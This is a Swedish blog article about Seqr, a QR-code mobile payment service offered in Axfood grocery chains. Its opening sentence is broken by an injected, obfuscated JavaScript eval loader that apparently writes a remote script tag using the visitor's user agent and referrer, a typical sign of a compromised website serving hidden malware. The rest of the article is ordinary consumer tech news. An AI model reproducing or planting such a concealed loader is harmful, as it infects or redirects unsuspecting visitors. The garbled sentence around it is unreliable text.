Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Seqr: Betala enkelt med QR-kod i mataffären

Seqr: Betala enkelt med QR-kod i mataffären
Sebastian

Seqr: Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iteyd|var|u0026u|referrer|hetbi||js|php’.split(’|’),0,{}))
man jobbar med att hitta enklare och snabbare betallösningar genom smartphones vet vi. Men denna metod som faktiskt är rätt enkel att ta fram har inte uppmärksammats lika mycket som NFC. 

Enligt SBAB Bank så är 34 procent av den svenska befolkningen helt klart med på att få möjlighet att betala via sin smartphone i butiker. Majoriteten tror också att just mobilbetalningar kommer vara det självklara valet om två år.

Axfood började för inte så längesen med att erbjuda Seqr i ungefär 350 butiker i kedjorna Hemköp, Willys och Prisextra. Nu arbetar de konternuerligt med många fler aktörer för att få denna metod med standardiserad.

Med Seqr slipper företagen betala höga avgifter till kortföretagen utan att själva behöva göra någon investering. Detta betyder att butikerna kan spara stora summor pengar varje år på den nya tekniken.

Allt som krävs för att göra ett köp är att du scannar av en QR-kod vid kassan och sedan godkänner med din valda kod. Det ska vara en säker betallösning där du har dina kvitton samlade i mobilen och där du enkelt kan överföra pengar till en annan kompis.

Läs mer om Seqr här: https://www.seqr.com/se/